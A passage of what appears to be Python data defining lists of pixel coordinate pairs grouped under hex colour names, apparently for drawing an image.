(78, 155), (78, 157), (79, 150), (79, 152), (79, 153), (79, 154), (79, 155), (79, 157), (80, 149), (80, 151), (80, 152), (80, 153), (80, 154), (80, 156), (81, 148), (81, 155), (82, 148), (82, 150), (82, 151), (82, 152), (82, 154), ) coordinates_00FF7F = ((107, 66), (107, 67), (107, 68), (107, 69), (107, 70), (107, 71), (107, 72), (107, 73), (107, 74), (107, 75), (107, 76), (107, 77), (107, 79), (108, 64), (108, 66), (108, 67), (108, 68), (108, 69), (108, 70), (108, 71), (108, 72), (108, 73), (108, 74), (108, 75), (108, 76), (108, 78), (109, 63), (109, 65), (110, 62), (110, 64), (111, 62), (111, 63), (112, 62), (112, 63), (113, 62), (114, 62), (114, 63), (115, 62), ) coordinates_CC5C5C = ((142, 140), (142, 141), (143, 140), (143, 142), (144, 139), (144, 142), (145, 139), (145, 141), (145, 143), (146, 138), (146, 141), (146, 143), (147, 137), (147, 139), (147, 140), (147, 142), (147, 144), (148, 136), (148, 141), (148, 144), (149, 136), (149, 137), (149, 142), (149, 145), (150, 136), (150, 137), (150, 142), (150, 144), (150, 146), (151, 136), (151, 137), (151, 142), (151, 144), (151, 146), (152, 136), (152, 137), (152, 142), (152, 144), (152, 145), (152, 147), (153, 136), (153, 137), (153, 142), (153, 144), (153, 145), (153, 146), (153, 148), (154, 136), (154, 137), (154, 142), (154, 144), (154, 145), (154, 146), (154, 147), (154, 149), (155, 136), (155, 142), (155, 144), (155, 145), (155, 146), (155, 147), (155, 149), (156, 142), (156, 144), (156, 145), (156, 146), (156, 147), (156, 148), (156, 150), (157, 142), (157, 144), (157, 145), (157, 146), (157, 147), (157, 148), (157, 150), (158, 142), (158, 144), (158, 145), (158, 146), (158, 147), (158, 148), (158, 149), (158, 151), (159, 143), (159, 145), (159, 146), (159, 147), (159, 148), (159, 149), (159, 151), (160, 144), (160, 146), (160, 147), (160, 148), (160, 149), (160, 151), (161, 145), (161, 147), (161, 148), (161, 149), (161, 150), (161, 152), (162, 146), (162, 148), (162, 149), (162, 150), (162, 152), (163, 147), (163, 149), (163, 150), (163, 152), (164, 148), (164, 150), (164, 152), (165, 141), (165, 149), (165, 152), (166, 141), (166, 142), (166, 150), (166, 152), (167, 142), (167, 150), (167, 152), (168, 143), (168, 145), (168, 149), (168, 152), (169, 144), (169, 146), (169, 147), (169, 150), (169, 152), (170, 145), (170, 149), (170, 150), (170, 152), (170, 153), (171, 146), (171, 148), (171, 149), (171, 150), (171, 151), (171, 153), (172, 147), (172, 149), (172, 150), (172, 152), (173, 148), (173, 150), (173, 152), (174, 148), (174, 151), (175, 149), (175, 151), (176, 150), (176, 151), ) coordinates_CD5C5C = ((84, 149), (84, 151), (84, 153), (85, 148), (86, 149), (86, 150), (86, 152), (87, 146), (87, 148), (87, 149), (87, 150), (87, 152), (88, 142), (88, 144), (88, 145), (88, 148), (88, 149), (88, 151), (89, 142), (89, 146), (89, 147), (89, 148), (89, 150), (90, 137), (90, 138), (90, 142), (90, 144), (90, 145), (90, 146), (90, 147), (90, 150), (91, 137), (91, 142), (91, 144), (91, 145), (91, 146), (91, 147), (91, 149), (92, 137), (92, 138), (92, 143), (92, 145), (92, 146), (92, 147), (93, 137), (93, 144), (93, 147), (94, 137), (94, 144), (94, 146), (95, 137), (95, 139), (95, 143), (95, 146), (96, 137), (96, 139), (96, 140), (96, 141), (96, 142), (96, 143), (96, 144), (96, 146), (97, 137), (97, 139), (97, 143), (97, 145), (98, 137), (98, 139), (98, 140), (98, 141), (98, 142), (99, 138), (99, 140), (99, 141), (99, 144), (100, 139), (100, 143), (101, 140), (101, 141), ) coordinates_FEA600 = ((162, 104), (163, 104), (164, 104), (164, 105), (165, 104), (165, 106), (166, 104), (166, 107), (166, 109), (167, 92), (167, 104), (167, 106), (167, 109), (168, 91), (168, 92), (168, 104), (168, 106), (168, 107), (168, 109), (169, 90), (169, 93), (169, 104), (169, 107), (169, 109), (170, 89), (170, 92), (170, 94), (170, 104), (170, 106), (170, 109), (171, 91), (171, 92), (171, 94), (171, 103), (171, 104), (171, 107), (171, 109), (172, 88), (172, 90), (172, 91), (172, 93), (172, 102), (172, 104), (172, 108), (172, 109), (173, 87), (173, 89), (173, 90), (173, 92), (173, 100), (173, 104), (173, 109), (174, 87), (174, 89), (174, 91), (174, 99), (174, 102), (174, 104), (175, 88), (175, 90), (175, 92), (175, 97), (175, 101), (175, 102), (175, 104), (176, 89), (176, 92), (176, 93), (176, 94), (176, 95), (176, 96), (176, 99), (176, 100), (176, 101), (176, 102), (176, 103), (176, 105), (177, 90), (177, 97), (177, 98), (177, 99), (177, 100), (177, 101), (177, 102), (177, 103), (177, 104), (177, 106), (178, 92), (178, 95), (178, 96), (178, 97), (178, 102), (178, 105), (178, 107), (179, 93), (179, 94), (179, 97), (179, 104), (179, 106), (179, 108), (180, 95), (180, 97), (180, 102), (180, 105), (180, 109), (181, 97), (181, 106), (181, 108), (182, 107), (182, 108), (183, 108), ) coordinates_FEA501 = ((59, 115), (59, 117), (59, 119), (60, 106), (60, 107), (60, 114), (60, 118), (60, 120), (61, 104), (61, 108), (61, 109), (61, 113), (61, 117), (61, 118), (61, 120), (62, 101), (62, 102), (62, 110), (62, 111), (62, 115), (62, 120), (63, 98), (63, 100), (63, 104), (63, 105), (63, 106), (63, 107), (63, 108), (63, 114), (64, 95), (64, 97), (64, 102), (64, 110), (64, 112), (64, 113), (64, 114), (65, 90), (65, 92), (65, 93), (65, 94), (65, 98), (65, 99), (65, 101), (65, 110), (65, 113), (66, 88), (66, 89), (66, 96), (66, 97), (66, 98), (66, 99), (66, 101), (66, 111), (66, 113), (67, 87), (67, 90), (67, 91), (67, 92), (67, 93), (67, 94), (67, 95), (67, 97), (67, 98), (67, 100), (67, 111), (67, 112), (68, 85), (68, 88), (68, 89), (68, 90), (68, 91), (68, 92), (68, 96), (68, 98), (68, 100), (68, 117), (69, 84), (69, 87), (69, 88), (69, 89), (69, 90), (69, 92), (69, 97), (69, 100), (69, 117), (70, 83), (70, 86), (70, 87), (70, 88), (70, 89), (70, 90), (70, 91), (70, 93), (70, 98), (70, 100), (71, 83), (71, 85), (71, 86), (71, 87), (71, 88), (71, 89), (71, 90), (71, 91), (71, 92), (71, 94), (72, 83), (72, 85), (72, 86), (72, 87), (72, 88), (72, 89), (72, 90), (72, 91), (72, 92), (72, 93), (72, 95), (73, 84), (73, 86), (73, 87), (73, 88), (73, 89), (73, 90), (73, 91), (73, 92), (73, 93), (73, 94), (73, 96), (74, 85), (74, 87), (74, 88), (74, 89), (74, 90), (74, 91), (74, 92), (74, 93), (74, 94), (75, 86), (75, 88), (75, 89), (75, 90), (75, 91), (75, 92), (75, 93), (75, 94), (75, 95), (75, 97), (76, 86), (76, 87), (76, 88), (76, 89), (76, 90), (76, 91), (76, 92), (76, 93), (76, 94), (76, 95), (76, 96), (76, 98), (77, 84), (77, 92), (77, 93), (77, 94), (77, 95), (77, 96), (77, 97), (77, 99), (78, 76), (78, 78), (78, 82), (78, 85), (78, 86), (78, 87), (78, 88), (78, 89), (78, 90), (78, 91), (78, 96), (78, 97), (78, 99), (79, 75), (79, 80), (79, 81), (79, 82), (79, 83), (79, 84), (79, 92), (79, 93), (79, 94), (79, 95), (79, 99), (80, 75), (80, 77), (80, 78), (80, 79), (80, 96), (80, 98), (80, 114), (80, 115), (81, 75), (81, 78), (81, 114), (81, 115), (82, 75), (82, 78), (82, 115), (83, 75), (83, 78), (83, 79), (83, 80), (83, 81), (83, 82), (83, 83), (83, 84), (83, 85), (83, 86), (83, 87), (83, 88), (83, 90), (84, 76), (84, 91), (85, 78), (85, 91), (86, 81), (86, 82), (86, 83), (86, 84), (86, 85), (86, 86), (86, 87), (86, 88), (86, 89), (86, 91), ) coordinates_DCF8A4 = ((90, 160), (90, 161), (91, 159), (91, 162), (92, 159), (92, 162), (93, 158), (93, 160), (93, 162), (94, 158), (94, 160), (94, 162), (95, 157), (95, 159), (95, 160), (95, 162), (96, 157), (96, 158), (96, 159), (96, 160), (96, 162), (97, 154), (97, 157), (97, 158), (97, 159), (97, 160), (97, 161), (97, 163), (98, 154), (98, 157), (98, 158), (98, 159), (98, 160), (98, 161), (98, 162), (98, 164), (99, 153), (99, 155), (99, 156), (99, 157), (99, 158), (99, 159), (99, 160), (99, 161), (99, 162), (99, 163), (99, 165), (100, 152), (100, 153), (100, 155), (100, 156), (100, 157), (100, 158), (100, 159), (100, 160), (100, 161), (100, 162), (100, 163), (100, 164), (100, 166), (101, 152), (101, 154), (101, 155), (101, 156), (101, 157), (101, 158), (101, 159), (101, 160), (101, 161), (101, 162), (101, 163), (101, 165), (102, 152), (102, 154), (102, 155), (102, 156), (102, 157), (102, 158), (102, 159), (102, 160), (102, 161), (102, 162), (102, 164), (103, 153), (103, 155), (103, 156), (103, 157), (103, 158), (103, 159), (103, 160), (103, 161), (103, 163), (104, 152), (104, 154), (104, 155), (104, 156), (104, 157), (104, 158), (104, 159), (104, 160), (104, 161), (104, 163), (105, 152), (105, 154), (105, 155), (105, 156), (105, 157), (105, 158), (105, 159), (105, 160), (105, 161), (105, 163), (106, 151), (106, 153), (106, 154), (106, 155), (106, 156), (106, 157), (106, 158), (106, 159), (106, 160), (106, 161), (106, 163), (107, 150), (107, 152), (107, 153), (107, 154), (107, 155), (107, 156), (107, 157), (107, 158), (107, 159), (107, 160), (107, 161), (107, 163), (108, 149), (108, 151), (108, 152), (108, 153), (108, 154), (108, 155), (108, 156), (108, 157), (108, 158), (108, 159), (108, 160), (108, 161), (108, 163), (109, 148), (109, 150), (109, 151), (109, 152), (109, 153), (109, 154), (109, 155), (109, 156), (109, 157), (109, 158), (109, 159), (109, 160), (109, 161), (109, 164), (110, 148), (110, 150), (110, 151), (110, 152), (110, 153), (110, 154), (110, 155), (110, 156), (110, 157), (110, 158), (110, 159), (110, 160), (110, 162), (110, 164), (111, 148), (111, 150), (111, 151), (111, 152), (111, 153), (111, 154), (111, 155), (111, 156), (111, 157), (111, 158), (111, 159), (111, 160), (111, 164), (112, 147), (112, 149), (112, 150), (112, 151), (112, 152), (112, 153), (112, 154), (112, 155), (112, 156), (112, 157), (112, 158), (112, 160), (113, 146), (113, 148), (113, 149), (113, 150), (113, 151), (113, 152), (113, 153), (113, 154), (113, 155), (113, 156), (113, 160), (114, 145), (114, 147), (114, 148), (114, 149), (114, 150), (114, 151), (114, 152), (114, 153), (114, 154), (114, 157), (114, 158), (114, 160), (115, 144), (115, 146), (115, 147), (115, 148), (115, 149), (115, 150), (115, 151), (115, 152), (115, 153), (116, 145), (116, 151), (116, 152), (116, 154), (117, 145), (117, 147), (117, 148), (117, 149), (117, 150), (117, 153), (118, 152), ) coordinates_DBF8A4 = ((127, 151), (128, 145), (128, 151), (128, 152), (129, 145), (129, 150), (129, 153), (130, 146), (130, 148), (130, 149), (130, 150), (130, 151), (130, 152), (130, 154), (131, 150), (131, 151), (131, 152), (131, 153), (132, 143), (132, 145), (132, 146), (132, 147), (132, 148), (132, 149), (132, 150), (132, 151), (132, 152), (132, 153), (132, 154), (132, 157), (132, 159), (133, 145), (133, 148), (133, 149), (133, 150), (133, 151), (133, 152), (133, 153), (133, 154), (133, 155), (133, 156), (133, 160), (134, 147), (134, 149), (134, 150), (134, 151), (134, 152), (134, 153), (134, 154), (134, 155), (134, 156), (134, 157), (134, 158), (134, 160), (135, 148), (135, 150), (135, 151), (135, 152), (135, 153), (135, 154), (135, 155), (135, 156), (135, 157), (135, 158), (135, 159), (135, 160), (135, 166), (136, 149), (136, 150), (136, 151), (136, 152), (136, 153), (136, 154), (136, 155), (136, 156), (136, 157), (136, 158), (136, 159), (136, 160), (136, 161), (136, 162), (136, 163), (136, 164), (136, 166), (137, 150), (137, 152), (137, 153), (137, 154), (137, 155), (137, 156), (137, 157), (137, 158), (137, 159), (137, 160), (137, 161), (137, 166), (138, 149), (138, 151), (138, 152), (138, 153), (138, 154), (138, 155), (138, 156), (138, 157), (138, 158), (138, 159), (138, 160), (138, 161), (138, 162), (138, 163), (138, 165), (139, 149), (139, 151), (139, 152), (139, 153), (139, 154), (139, 155), (139, 156), (139, 157), (139, 158), (139, 159), (139, 160), (139, 161), (139, 162), (139, 163), (139, 165), (140, 150), (140, 152), (140, 153), (140, 154), (140, 155), (140, 156), (140, 157), (140, 158), (140, 159), (140, 160), (140, 161), (140, 162), (140, 163), (140, 165), (141, 151), (141, 153), (141, 154), (141, 155), (141, 156), (141, 157), (141, 158), (141, 159), (141, 160), (141, 161), (141, 162), (141, 163), (141, 165), (142, 152), (142, 154), (142, 155), (142, 156), (142, 157), (142, 158), (142, 159), (142, 160), (142, 161), (142, 162), (142, 163), (142, 164), (142, 165), (143, 152), (143, 154), (143, 155), (143, 156), (143, 157), (143, 158), (143, 159), (143, 160), (143, 161), (143, 162), (143, 163), (143, 164), (143, 165), (143, 167), (143, 169), (144, 152), (144, 154), (144, 155), (144, 156), (144, 157), (144, 158), (144, 159), (144, 160), (144, 161), (144, 162), (144, 163), (144, 164), (144, 165), (145, 153), (145, 155), (145, 156), (145, 157), (145, 158), (145, 159), (145, 160), (145, 161), (145, 162), (145, 163), (145, 164), (145, 166), (146, 153), (146, 155), (146, 156), (146, 157), (146, 158), (146, 159), (146, 160), (146, 161), (146, 162), (146, 163), (146, 165), (147, 153), (147, 157), (147, 158), (147, 159), (147, 160), (147, 161), (147, 162), (147, 163), (147, 165), (148, 153), (148, 155), (148, 158), (148, 159), (148, 160), (148, 161), (148, 162), (148, 163), (148, 165), (149, 157), (149, 159), (149, 160), (149, 161), (149, 162), (149, 163), (149, 165), (150, 158), (150, 160), (150, 161), (150, 162), (150, 163), (150, 165), (151, 158), (151, 160), (151, 161), (151, 162), (151, 163), (151, 164), (151, 166), (152, 159), (152, 161), (152, 162), (152, 163), (152, 167), (153, 159), (153, 161), (153, 162), (153, 164), (154, 159), (154, 160), (154, 161), (154, 163), (155, 160), (155, 163), (156, 160), (156, 162), (156, 163), (157, 161), (157, 162), (158, 161), (158, 162), (159, 162), (160, 162), (161, 162), ) coordinates_2ACCA4 = ((114, 162), (115, 161), (116, 160), (117, 156), (117, 159), (118, 155), (118, 158), (119, 158), (120, 153), (120, 157), (121, 152), (121, 154), (121, 156), (122, 152), (122, 155), (123, 152), (123, 154), (124, 151), (124, 153), (124, 155), (125, 152), (125, 155), (126, 152), (126, 156), (127, 156), (127, 158), (128, 155), (128, 159), (129, 156), (129, 160), (130, 157), (130, 159), (130, 161), (131, 161), (132, 162), ) coordinates_60CC60 = ((75, 161), (75, 163), (76, 161), (76, 165), (77, 160), (77, 162), (77, 163), (77, 166), (78, 160), (78, 162), (78, 163), (78, 164), (78, 165), (78, 167), (79, 159), (79, 161), (79, 162), (79, 163), (79, 164), (79, 165), (79, 166), (79, 168), (80, 159), (80, 161), (80, 162), (80, 163), (80, 164), (80, 165), (80, 166), (80, 167), (80, 169), (81, 157), (81, 159), (81, 160), (81, 161), (81, 162), (81, 163), (81, 164), (81, 165), (81, 166), (81, 167), (81, 168), (81, 170), (82, 156), (82, 159), (82, 160), (82, 161), (82, 162), (82, 163), (82, 164), (82, 165), (82, 166), (82, 167), (82, 168), (82, 170), (83, 155), (83, 158), (83, 159), (83, 160), (83, 161), (83, 162), (83, 163), (83, 164), (83, 165), (83, 166), (83, 167), (83, 168), (83, 170), (84, 155), (84, 157), (84, 158), (84, 159), (84, 160), (84, 161), (84, 162), (84, 163), (84, 164), (84, 165), (84, 166), (84, 167), (84, 168), (84, 169), (84, 170), (84, 171), (85, 155), (85, 157), (85, 158), (85, 159), (85, 160), (85, 161), (85, 162), (85, 163), (85, 164), (85, 165), (85, 166), (85, 167), (85, 168), (85, 169), (85, 171), (86, 154), (86, 156), (86, 157), (86, 158), (86, 159), (86, 160), (86, 161), (86, 162), (86, 163), (86, 164), (86, 165), (86, 166), (86, 167), (86, 168), (86, 169), (86, 171), (87, 154), (87, 156), (87, 157), (87, 158), (87, 163), (87, 164), (87, 165), (87, 166), (87, 167), (87, 168), (87, 169), (87, 171), (88, 153), (88, 155), (88, 156), (88, 157), (88, 164), (88, 165), (88, 166), (88, 167), (88, 168), (88, 169), (88, 171), (89, 153), (89, 155), (89, 156), (89, 158), (89, 163), (89, 165), (89, 166), (89, 167), (89, 168), (89, 169), (89, 171), (90, 152), (90, 154), (90, 155), (90, 156), (90, 158), (90, 164), (90, 166), (90, 167), (90, 168), (90, 169), (90, 170), (90, 172), (91, 151), (91, 153), (91, 154), (91, 155), (91, 157), (91, 164), (91, 166), (91, 167), (91, 168), (91, 169), (91, 170), (91, 172), (92, 151), (92, 153), (92, 154), (92, 155), (92, 156), (92, 164), (92, 166), (92, 167), (92, 168), (92, 169), (92, 170), (92, 172), (93, 150), (93, 152), (93, 154), (93, 156), (93, 164), (93, 166), (93, 167), (93, 168), (93, 169), (93, 170), (93, 171), (93, 173), (94, 150), (94, 152), (94, 164), (94, 166), (94, 167), (94, 168), (94, 169), (94, 170), (94, 171), (94, 173), (95, 149), (95, 151), (95, 155), (95, 164), (95, 166), (95, 167), (95, 168), (95, 169), (95, 170), (95, 171), (95, 173), (96, 148), (96, 151), (96, 164), (96, 167), (96, 168), (96, 169), (96, 170), (96, 171), (96, 173), (97, 148), (97, 151), (97, 165), (97, 168), (97, 169), (97, 170), (97, 171), (97, 173), (98, 147), (98, 149), (98, 151), (98, 167), (98, 169), (98, 170), (98, 171), (98, 173), (99, 146), (99, 148), (99, 149), (99, 151), (99, 167), (99, 169), (99, 170), (99, 172), (100, 145), (100, 147), (100, 148), (100, 150), (100, 168), (100, 170), (100, 172), (101, 144), (101, 146), (101, 147), (101, 148), (101, 150), (101, 168), (101, 170), (101, 172), (102, 143), (102, 145), (102, 146), (102, 147), (102, 148), (102, 150), (102, 167), (102, 169), (102, 170), (102, 172), (103, 142), (103, 144), (103, 145), (103, 146), (103, 147), (103, 148), (103, 150), (103, 166), (103, 168), (103, 169), (103, 170), (103, 171), (103, 172), (104, 141), (104, 143), (104, 144), (104, 145), (104, 146), (104, 147), (104, 148), (104, 150), (104, 165), (104, 167), (104, 168), (104, 169), (104, 170), (104, 171), (104, 172), (105, 141), (105, 143), (105, 144), (105, 145), (105, 146), (105, 147), (105, 149), (105, 165), (105, 167), (105, 168), (105, 169), (105, 170), (105, 172), (106, 140), (106, 142), (106, 143), (106, 144), (106, 145), (106, 146), (106, 148), (106, 165), (106, 167), (106, 168), (106, 169), (106, 170), (106, 171), (106, 173), (107, 139), (107, 141), (107, 142), (107, 143), (107, 144), (107, 145), (107, 147), (107, 165), (107, 167), (107, 168), (107, 169), (107, 170), (107, 171), (107, 172), (107, 174), (108, 139), (108, 141), (108, 142), (108, 143), (108, 144), (108, 146), (108, 166), (108, 168), (108, 169), (108, 170), (108, 171), (108, 172), (108, 175), (109, 138), (109, 140), (109, 141), (109, 142), (109, 143), (109, 144), (109, 146), (109, 166), (109, 168), (109, 169), (109, 170), (109, 171), (109, 172), (109, 173), (109, 176), (110, 137), (110, 139), (110, 140), (110, 141), (110, 142), (110, 143), (110, 144), (110, 146), (110, 166), (110, 168), (110, 169), (110, 170), (110, 171), (110, 172), (110, 173), (110, 174), (110, 175), (110, 177), (111, 136), (111, 138), (111, 139), (111, 140), (111, 141), (111, 142), (111, 143), (111, 145), (111, 166), (111, 168), (111, 169), (111, 170), (111, 171), (111, 172), (111, 173), (111, 174), (111, 175), (111, 176), (111, 178), (112, 135), (112, 137), (112, 138), (112, 139), (112, 140), (112, 141), (112, 142), (112, 144), (112, 162), (112, 166), (112, 168), (112, 169), (112, 170), (112, 171), (112, 172), (112, 173), (112, 174), (112, 175), (112, 176), (112, 177), (112, 179), (113, 133), (113, 136), (113, 137), (113, 138), (113, 139), (113, 140), (113, 141), (113, 143), (113, 164), (113, 166), (113, 167), (113, 168), (113, 169), (113, 170), (113, 171), (113, 172), (113, 173), (113, 174), (113, 175), (113, 176), (113, 177), (113, 178), (113, 180), (114, 132), (114, 135), (114, 136), (114, 137), (114, 138), (114, 139), (114, 140), (114, 142), (114, 164), (114, 166), (114, 167), (114, 168), (114, 169), (114, 170), (114, 171), (114, 172), (114, 173), (114, 174), (114, 175), (114, 176), (114, 177), (114, 178), (114, 180), (115, 131), (115, 142), (115, 163), (115, 164), (115, 166), (115, 167), (115, 168), (115, 169), (115, 170), (115, 171), (115, 172), (115, 173), (115, 174), (115, 175), (115, 176), (115, 177), (115, 180), (116, 130), (116, 132), (116, 133), (116, 134), (116, 135), (116, 136), (116, 137), (116, 138), (116, 139), (116, 140), (116, 142), (116, 163), (116, 165), (116, 166), (116, 167), (116, 168), (116, 169), (116, 170), (116, 171), (116, 172), (116, 173), (116, 178), (116, 180), (117, 127), (117, 162), (117, 164), (117, 165), (117, 166), (117, 167), (117, 168), (117, 169), (117, 170), (117, 171), (117, 174), (117, 175), (117, 176), (117, 177), (118, 161), (118, 163), (118, 164), (118, 165), (118, 166), (118, 167), (118, 168), (118, 169), (118, 170), (118, 172), (118, 173), (119, 161), (119, 163), (119, 164), (119, 165), (119, 166), (119, 168), (119, 169), (119, 171), (120, 162), (120, 170), (121, 163), (121, 165), (121, 166), (121, 169), ) coordinates_5FCC60 = ((123, 165), (123, 167), (123, 169), (124, 165), (124, 169), (125, 162), (125, 166), (125, 167), (125, 169), (126, 161), (126, 164), (126, 165), (126, 166), (126, 167), (126, 168), (126, 170), (127, 163), (127, 164), (127, 165), (127, 166), (127, 167), (127, 168), (127, 169), (127, 171), (128, 147), (128, 148), (128, 161), (128, 163), (128, 164), (128, 165), (128, 166), (128, 167), (128, 168), (128, 169), (128, 170), (128, 172), (129, 131), (129, 133), (129, 134), (129, 135), (129, 136), (129, 137), (129, 138), (129, 139), (129, 140), (129, 141), (129, 143), (129, 162), (129, 164), (129, 165), (129, 166), (129, 167), (129, 168), (129, 169), (129, 170), (129, 171), (129, 173), (130, 132), (130, 141), (130, 142), (130, 144), (130, 163), (130, 165), (130, 166), (130, 167), (130, 168), (130, 169), (130, 170), (130, 171), (130, 172), (130, 175), (131, 133), (131, 136), (131, 137), (131, 138), (131, 139), (131, 140), (131, 164), (131, 166), (131, 167), (131, 168), (131, 169), (131, 170), (131, 171), (131, 172), (131, 173), (131, 176), (131, 177), (132, 134), (132, 137), (132, 138), (132, 140), (132, 164), (132, 168), (132, 169), (132, 170), (132, 171), (132, 172), (132, 173), (132, 174), (132, 175), (132, 178), (132, 179), (132, 180), (132, 181), (132, 183), (133, 138), (133, 139), (133, 141), (133, 164), (133, 166), (133, 168), (133, 169), (133, 170), (133, 171), (133, 172), (133, 173), (133, 174), (133, 175), (133, 176), (133, 177), (134, 137), (134, 139), (134, 140), (134, 143), (134, 162), (134, 168), (134, 170), (134, 171), (134, 172), (134, 173), (134, 174), (134, 175), (134, 176), (134, 177), (134, 178), (134, 179), (134, 180), (134, 181), (134, 183), (135, 138), (135, 140), (135, 141), (135, 145), (135, 168), (135, 170), (135, 171), (135, 172), (135, 173), (135, 174), (135, 175), (135, 176), (135, 177), (135, 178), (135, 179), (135, 180), (135, 181), (135, 183), (136, 141), (136, 142), (136, 143), (136, 147), (136, 168), (136, 170), (136, 171), (136, 172), (136, 173), (136, 174), (136, 175), (136, 176), (136, 177), (136, 178), (136, 179), (136, 180), (136, 182), (137, 139), (137, 141), (137, 142), (137, 143), (137, 144), (137, 145), (137, 147), (137, 168), (137, 170), (137, 171), (137, 172), (137, 173), (137, 174), (137, 175), (137, 176), (137, 177), (137, 178), (137, 179), (137, 180), (137, 182), (138, 140), (138, 142), (138, 143), (138, 144), (138, 145), (138, 147), (138, 168), (138, 170), (138, 171), (138, 172), (138, 173), (138, 174), (138, 175), (138, 176), (138, 177), (138, 178), (138, 179), (138, 180), (138, 182), (139, 141), (139, 143), (139, 144), (139, 145), (139, 147), (139, 167), (139, 169), (139, 170), (139, 171), (139, 172), (139, 173), (139, 174), (139, 175), (139, 176), (139, 177), (139, 178), (139, 179), (139, 181), (140, 142), (140, 144), (140, 145), (140, 147), (140, 167), (140, 171), (140, 172), (140, 173), (140, 174), (140, 175), (140, 176), (140, 177), (140, 181), (141, 142), (141, 144), (141, 145), (141, 146), (141, 148), (141, 167), (141, 169), (141, 170), (141, 171), (141, 172), (141, 173), (141, 174), (141, 175), (141, 176), (141, 179), (142, 143), (142, 145), (142, 146), (142, 147), (142, 150), (142, 172), (142, 174), (142, 175), (142, 177), (143, 144), (143, 146), (143, 147), (143, 148), (143, 150), (143, 172), (143, 174), (143, 176), (144, 145), (144, 147), (144, 148), (144, 150), (144, 170), (144, 172), (144, 173), (144, 175), (145, 145), (145, 147), (145, 148), (145, 150), (145, 169), (145, 172), (145, 174), (146, 146), (146, 148), (146, 149), (146, 151), (146, 168), (146, 170), (146, 171), (146, 172), (146, 174), (147, 146), (147, 148), (147, 149), (147, 151), (147, 167), (147, 169), (147, 170), (147, 171), (147, 172), (147, 174), (148, 147), (148, 149), (148, 151), (148, 167), (148, 169), (148, 170), (148, 171), (148, 172), (148, 174), (149, 147), (149, 149), (149, 151), (149, 167), (149, 169), (149, 170), (149, 171), (149, 172), (149, 174), (150, 148), (150, 150), (150, 151), (150, 152), (150, 155), (150, 168), (150, 170), (150, 171), (150, 172), (150, 174), (151, 149), (151, 151), (151, 153), (151, 156), (151, 169), (151, 171), (151, 172), (151, 174), (152, 150), (152, 152), (152, 154), (152, 156), (152, 169), (152, 171), (152, 172), (152, 174), (153, 150), (153, 152), (153, 153), (153, 154), (153, 155), (153, 157), (153, 168), (153, 170), (153, 171), (153, 172), (153, 174), (154, 151), (154, 153), (154, 154), (154, 155), (154, 157), (154, 165), (154, 166), (154, 168), (154, 169), (154, 170), (154, 171), (154, 172), (154, 174), (155, 152), (155, 154), (155, 155), (155, 156), (155, 158), (155, 165), (155, 168), (155, 169), (155, 170), (155, 171), (155, 173), (156, 152), (156, 154), (156, 155), (156, 156), (156, 158), (156, 165), (156, 167), (156, 168), (156, 169), (156, 170), (156, 171), (156, 173), (157, 153), (157, 155), (157, 156), (157, 158), (157, 165), (157, 167), (157, 168), (157, 169), (157, 170), (157, 172), (158, 153), (158, 155), (158, 156), (158, 157), (158, 159), (158, 164), (158, 165), (158, 166), (158, 167), (158, 168), (158, 169), (158, 170), (158, 172), (159, 153), (159, 155), (159, 156), (159, 157), (159, 159), (159, 164), (159, 166), (159, 167), (159, 168), (159, 169), (159, 170), (159, 172), (160, 154), (160, 156), (160, 157), (160, 158), (160, 160), (160, 164), (160, 166), (160, 167), (160, 168), (160, 169), (160, 171), (161, 154), (161, 156), (161, 157), (161, 158), (161, 160), (161, 164), (161, 166), (161, 167), (161, 168), (161, 169), (161, 171), (162, 155), (162, 157), (162, 158), (162, 159), (162, 161), (162, 164), (162, 166), (162, 167), (162, 168), (162, 170), (163, 155), (163, 157), (163, 158), (163, 159), (163, 160), (163, 163), (163, 164), (163, 165), (163, 166), (163, 167), (163, 168), (163, 170), (164, 155), (164, 157), (164, 158), (164, 159), (164, 160), (164, 161), (164, 164), (164, 165), (164, 166), (164, 167), (164, 169), (165, 155), (165, 157), (165, 158), (165, 159), (165, 160), (165, 161), (165, 162), (165, 163), (165, 164), (165, 165), (165, 166), (165, 168), (166, 155), (166, 157), (166, 158), (166, 159), (166, 160), (166, 161), (166, 162), (166, 163), (166, 164), (166, 165), (166, 167), (167, 155), (167, 160), (167, 161), (167, 162), (167, 163), (167, 164), (167, 166), (168, 155), (168, 158), (168, 161), (168, 162), (168, 165), (169, 156), (169, 160), (169, 164), (170, 155), (170, 161), ) coordinates_F4DEB3 = ((128, 65), (129, 64), (129, 65), (130, 64), (130, 65), (131, 63), (132, 63), (132, 64), (133, 63), (133, 64), (134, 63), (135, 63), (135, 65), (135, 73), (136, 63), (136, 67), (136, 70), (137, 64), (137, 68), (137, 72), (137, 74), (138, 67), (138, 69), (138, 70), (138, 71), (138, 75), (139, 67), (139, 69), (139, 73), (140, 66), (140, 71), (141, 66), (141, 69), (142, 65), (142, 67), (143, 64), (143, 66), (144, 66), (144, 71), (144, 73), (144, 75), (145, 65), (145, 66), (145, 70), (145, 75), (146, 65), (146, 66), (146, 72), (146, 92), (146, 94), (147, 65), (147, 66), (147, 89), (147, 90), (147, 95), (148, 65), (148, 67), (148, 87), (148, 88), (148, 91), (148, 92), (148, 95), (149, 66), (149, 68), (149, 84), (149, 85), (149, 86), (149, 89), (149, 90), (149, 91), (149, 92), (149, 95), (150, 66), (150, 69), (150, 79), (150, 80), (150, 81), (150, 82), (150, 83), (150, 87), (150, 88), (150, 89), (150, 90), (150, 91), (150, 92), (150, 95), (151, 66), (151, 72), (151, 73), (151, 74), (151, 75), (151, 76), (151, 77), (151, 78), (151, 84), (151, 85), (151, 86), (151, 87), (151, 88), (151, 89), (151, 90), (151, 92), (152, 67), (152, 71), (152, 79), (152, 80), (152, 81), (152, 82), (152, 83), (152, 84), (152, 85), (152, 86), (152, 87), (152, 88), (152, 89), (152, 91), (153, 68), (153, 70), (153, 71), (153, 74), (153, 75), (153, 76), (153, 77), (153, 78), (153, 79), (153, 80), (153, 81), (153, 82), (153, 83), (153, 84), (153, 85), (153, 86), (153, 87), (153, 88), (153, 89), (153, 91), (154, 72), (154, 74), (154, 75), (154, 76), (154, 77), (154, 78), (154, 79), (154, 80), (154, 81), (154, 82), (154, 83), (154, 84), (154, 85), (154, 86), (154, 87), (154, 88), (154, 90), (155, 74), (155, 76), (155, 77), (155, 78), (155, 79), (155, 80), (155, 81), (155, 82), (155, 83), (155, 84), (155, 85), (155, 86), (155, 89), (156, 74), (156, 76), (156, 77), (156, 78), (156, 79), (156, 80), (156, 81), (156, 82), (156, 83), (156, 88), (157, 74), (157, 76), (157, 77), (157, 78), (157, 79), (157, 80), (157, 84), (157, 86), (158, 74), 